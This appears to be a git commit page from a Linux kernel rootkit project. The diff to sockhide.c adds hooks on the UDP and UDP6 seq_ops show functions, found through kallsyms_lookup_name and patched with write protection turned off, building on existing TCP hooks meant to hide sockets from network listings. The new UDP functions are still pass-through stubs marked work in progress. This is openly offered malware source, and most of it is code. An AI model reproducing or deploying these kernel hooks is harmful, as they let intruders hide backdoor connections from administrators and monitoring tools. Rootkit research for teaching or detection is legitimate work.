linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit d17748674893998bee3cff02e69537d865826a9d
parent d455c4408a11ea78d165489add187cbc13ba7dc2
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat, 12 Dec 2020 17:49:23 +0100

Add further hooks, implementation is WIP

Diffstat:

Msrc/sockhide.c | 33+++++++++++++++++++++++++++++++++


1 file changed, 33 insertions(+), 0 deletions(-)

diff --git a/src/sockhide.c b/src/sockhide.c
@@ -20,6 +20,8 @@ static int (*udp6_seq_show)(struct seq_file *seq, void *v);
 
 static int g7_tcp4_seq_show(struct seq_file *, void *);
 static int g7_tcp6_seq_show(struct seq_file *, void *);
+static int g7_udp4_seq_show(struct seq_file *, void *);
+static int g7_udp6_seq_show(struct seq_file *, void *);
 
 void
 hook_show(void)
@@ -30,12 +32,24 @@ hook_show(void)
     tcp6_seq_show 
         = ((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show;
 
+    udp4_seq_show 
+        = ((struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"))->show;
+
+    udp6_seq_show 
+        = ((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show;
+
     disable_protection();
     ((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
         = (void *)g7_tcp4_seq_show;
     
     ((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show
         = (void *)g7_tcp6_seq_show;
+
+    ((struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"))->show
+        = (void *)g7_udp4_seq_show;
+
+    ((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show
+        = (void *)g7_udp6_seq_show;
     enable_protection();    
 }
 
@@ -48,6 +62,12 @@ unhook_show(void)
 
     ((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show
         = (void *)tcp6_seq_show;
+
+    ((struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"))->show
+        = (void *)udp4_seq_show;
+
+    ((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show
+        = (void *)udp6_seq_show;
     enable_protection();
 }
 
@@ -92,3 +112,15 @@ g7_tcp6_seq_show(struct seq_file *seq, void *v)
     
     return tcp6_seq_show(seq, v);
 }
+
+static int
+g7_udp4_seq_show(struct seq_file *seq, void *v)
+{
+    return udp4_seq_show(seq, v);
+}
+
+static int
+g7_udp6_seq_show(struct seq_file *seq, void *v)
+{
+    return udp6_seq_show(seq, v);
+}
+\ No newline at end of file